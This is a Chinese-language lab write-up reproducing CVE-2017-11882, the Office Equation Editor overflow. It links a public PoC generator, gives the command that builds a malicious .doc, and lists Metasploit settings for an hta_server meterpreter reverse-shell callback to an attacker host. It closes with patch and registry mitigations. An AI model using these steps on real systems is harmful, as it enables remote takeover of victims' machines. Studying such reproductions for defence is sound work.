作者: 墨阳
免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。
0x01 前言
1、漏洞简介
CVE-2017-11882是微软公布的一个远程执行漏洞,该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的ole数据时,在拷贝公式字体名称时没有对名称长度进行校验,从而造成栈缓冲区溢出。
2、影响范围
office 2003
office 2007
office 2010
office 2013
office 2016
3、测试环境
win10:21H1
office:2016
0x02 漏洞复现
1、poc下载
下载地址:https://github.com/Ridter/CVE-2017-11882
python Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
2、windows靶机打开
0x03 上线MSF
1、msf设置:
use exploit/windows/misc/hta_server
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.61.131
set lport 4444
2、生成doc文档
3、靶机打开上线
0x04 修复建议
1.下载微软对此漏洞补丁
下载地址:https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-11882
2.在注册表中禁用该漏洞模块
reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400
0x05 了解更多安全知识
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!
欢迎关注我们的安全公众号,学习更多安全知识!!!